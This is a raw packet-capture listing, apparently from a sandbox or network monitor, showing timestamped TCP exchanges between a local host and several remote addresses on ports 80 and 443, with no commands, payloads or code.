                                                                                                                                                                                                            Nov 22, 2024 04:26:27.454128027 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.454819918 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.454886913 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.454926014 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.500463963 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.500478983 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.500540972 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.500628948 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.500720978 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.500762939 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.501492023 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.501575947 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.502376080 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.502418995 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.502471924 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.502511978 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.503204107 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.503304958 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.504070997 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.504110098 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.504173040 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.504940033 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.504972935 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.505011082 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.505042076 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.505775928 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.505893946 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.506659985 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.506696939 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.506756067 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.506792068 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.507497072 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.507616043 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.508189917 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.508369923 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.508482933 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.508699894 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.509280920 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.509390116 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.510072947 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.510116100 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.510189056 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.510227919 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.510936975 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.511001110 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.511046886 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.511787891 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.511902094 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.511996984 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.512677908 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.512764931 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.512814045 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.513503075 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.513607025 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.513653040 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.514370918 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.514466047 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.514552116 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.515176058 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.555308104 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.652405977 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.680849075 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:36.890564919 CET49759443192.168.2.4142.250.181.100
                                                                                                                                                                                                            Nov 22, 2024 04:26:36.890599012 CET44349759142.250.181.100192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:36.890696049 CET49759443192.168.2.4142.250.181.100
                                                                                                                                                                                                            Nov 22, 2024 04:26:36.891031027 CET49759443192.168.2.4142.250.181.100
                                                                                                                                                                                                            Nov 22, 2024 04:26:36.891041994 CET44349759142.250.181.100192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:37.671152115 CET49762443192.168.2.4184.30.17.174
                                                                                                                                                                                                            Nov 22, 2024 04:26:37.671181917 CET44349762184.30.17.174192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:37.671412945 CET49762443192.168.2.4184.30.17.174
                                                                                                                                                                                                            Nov 22, 2024 04:26:37.672615051 CET49762443192.168.2.4184.30.17.174
                                                                                                                                                                                                            Nov 22, 2024 04:26:37.672635078 CET44349762184.30.17.174192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:38.160051107 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:38.659902096 CET44349759142.250.181.100192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:38.660159111 CET49759443192.168.2.4142.250.181.100
                                                                                                                                                                                                            Nov 22, 2024 04:26:38.660171986 CET44349759142.250.181.100192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:38.661869049 CET44349759142.250.181.100192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:38.661928892 CET49759443192.168.2.4142.250.181.100
                                                                                                                                                                                                            Nov 22, 2024 04:26:38.662938118 CET49759443192.168.2.4142.250.181.100
                                                                                                                                                                                                            Nov 22, 2024 04:26:38.663021088 CET44349759142.250.181.100192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:38.711633921 CET49759443192.168.2.4142.250.181.100
                                                                                                                                                                                                            Nov 22, 2024 04:26:38.711649895 CET44349759142.250.181.100192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:38.759514093 CET49759443192.168.2.4142.250.181.100
                                                                                                                                                                                                            Nov 22, 2024 04:26:39.131158113 CET44349762184.30.17.174192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:39.131228924 CET49762443192.168.2.4184.30.17.174
                                                                                                                                                                                                            Nov 22, 2024 04:26:39.138992071 CET49762443192.168.2.4184.30.17.174
                                                                                                                                                                                                            Nov 22, 2024 04:26:39.139015913 CET44349762184.30.17.174192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:39.139452934 CET44349762184.30.17.174192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:39.180823088 CET49762443192.168.2.4184.30.17.174
                                                                                                                                                                                                            Nov 22, 2024 04:26:39.183757067 CET49762443192.168.2.4184.30.17.174
                                                                                                                                                                                                            Nov 22, 2024 04:26:39.231333017 CET44349762184.30.17.174192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:39.665157080 CET44349762184.30.17.174192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:39.665288925 CET44349762184.30.17.174192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:39.666337013 CET49762443192.168.2.4184.30.17.174
                                                                                                                                                                                                            Nov 22, 2024 04:26:39.671175957 CET49762443192.168.2.4184.30.17.174
                                                                                                                                                                                                            Nov 22, 2024 04:26:39.671205997 CET44349762184.30.17.174192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:39.671219110 CET49762443192.168.2.4184.30.17.174
                                                                                                                                                                                                            Nov 22, 2024 04:26:39.671226978 CET44349762184.30.17.174192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:39.706351995 CET49763443192.168.2.4184.30.17.174
                                                                                                                                                                                                            Nov 22, 2024 04:26:39.706391096 CET44349763184.30.17.174192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:39.706547976 CET49763443192.168.2.4184.30.17.174
                                                                                                                                                                                                            Nov 22, 2024 04:26:39.706851006 CET49763443192.168.2.4184.30.17.174
                                                                                                                                                                                                            Nov 22, 2024 04:26:39.706870079 CET44349763184.30.17.174192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:39.985791922 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:39.985877991 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:39.985982895 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:39.986258030 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:39.986301899 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:40.260374069 CET49770443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:40.260471106 CET4434977013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:40.260562897 CET49770443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:40.260757923 CET49770443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:40.260811090 CET4434977013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:41.093123913 CET44349763184.30.17.174192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:41.093205929 CET49763443192.168.2.4184.30.17.174
                                                                                                                                                                                                            Nov 22, 2024 04:26:41.094377041 CET49763443192.168.2.4184.30.17.174
                                                                                                                                                                                                            Nov 22, 2024 04:26:41.094391108 CET44349763184.30.17.174192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:41.095343113 CET44349763184.30.17.174192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:41.096383095 CET49763443192.168.2.4184.30.17.174
                                                                                                                                                                                                            Nov 22, 2024 04:26:41.143340111 CET44349763184.30.17.174192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:41.651765108 CET44349763184.30.17.174192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:41.651940107 CET44349763184.30.17.174192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:41.651992083 CET49763443192.168.2.4184.30.17.174
                                                                                                                                                                                                            Nov 22, 2024 04:26:41.652775049 CET49763443192.168.2.4184.30.17.174
                                                                                                                                                                                                            Nov 22, 2024 04:26:41.652801991 CET44349763184.30.17.174192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:41.777040005 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:41.777437925 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:41.777501106 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:41.778559923 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:41.778641939 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:41.779577971 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:41.779645920 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:41.779778957 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:41.822280884 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:41.822304010 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:41.867016077 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.119889021 CET4434977013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.120112896 CET49770443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.120173931 CET4434977013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.121933937 CET4434977013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.122005939 CET49770443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.122881889 CET49770443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.122972965 CET4434977013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.123023033 CET49770443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.163038015 CET49770443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.163059950 CET4434977013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.208951950 CET49770443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.283128023 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.283147097 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.283153057 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.283178091 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.283190966 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.283210993 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.283214092 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.283266068 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.283298969 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.283298969 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.283391953 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.471622944 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.471645117 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.471724987 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.471725941 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.471760035 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.471925020 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.520253897 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.520270109 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.520353079 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.520353079 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.520376921 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.520870924 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.613485098 CET4434977013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.613503933 CET4434977013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.613514900 CET4434977013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.613539934 CET4434977013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.613547087 CET4434977013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.613555908 CET4434977013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.613596916 CET49770443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.613634109 CET4434977013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.613675117 CET49770443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.614593029 CET49770443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.651628971 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.651647091 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.651716948 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.651747942 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.651787996 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.651885986 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.686834097 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.686851978 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.687006950 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.687035084 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.687223911 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.704574108 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.704591990 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.704668045 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.704685926 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.705048084 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.725173950 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.725192070 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.725277901 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.725277901 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.725317001 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.725512028 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.811763048 CET4434977013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.811840057 CET4434977013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.811897039 CET49770443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.811961889 CET4434977013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.812009096 CET49770443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.812156916 CET49770443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.818954945 CET4434977013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.844558954 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.844578028 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.844650984 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.844734907 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.844779015 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.844877005 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.859242916 CET49770443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.860722065 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.860737085 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.860829115 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.860829115 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.860850096 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.861156940 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.863858938 CET4434977013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.863881111 CET4434977013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.863929033 CET4434977013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.863965988 CET4434977013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.863975048 CET49770443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.864017010 CET4434977013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.864036083 CET49770443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.864176035 CET49770443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.873929024 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.873951912 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.874000072 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.874013901 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.874046087 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.874346972 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.878648043 CET4434977013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.878773928 CET49770443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.878788948 CET4434977013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.878846884 CET4434977013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.879039049 CET49770443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.880203962 CET49770443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.880235910 CET4434977013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.889257908 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.889276981 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.889646053 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.889664888 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.889725924 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.904491901 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.904506922 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.904650927 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.904669046 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.904722929 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.914386988 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.914424896 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.914473057 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.914551973 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.914551973 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.916165113 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:42.916199923 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:43.372359037 CET49776443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:43.372431993 CET4434977613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:43.372507095 CET49776443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:43.372730970 CET49776443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:43.372780085 CET4434977613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:43.448122025 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:43.448218107 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:43.448302984 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:43.448642015 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:43.448677063 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.224086046 CET4434977613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.224396944 CET49776443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.224428892 CET4434977613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.225502014 CET4434977613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.225567102 CET49776443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.225922108 CET49776443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.225996971 CET4434977613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.226152897 CET49776443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.226166010 CET4434977613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.245086908 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.248423100 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.248467922 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.249948978 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.250051022 CET49777443192.168.2.413.107.246.63
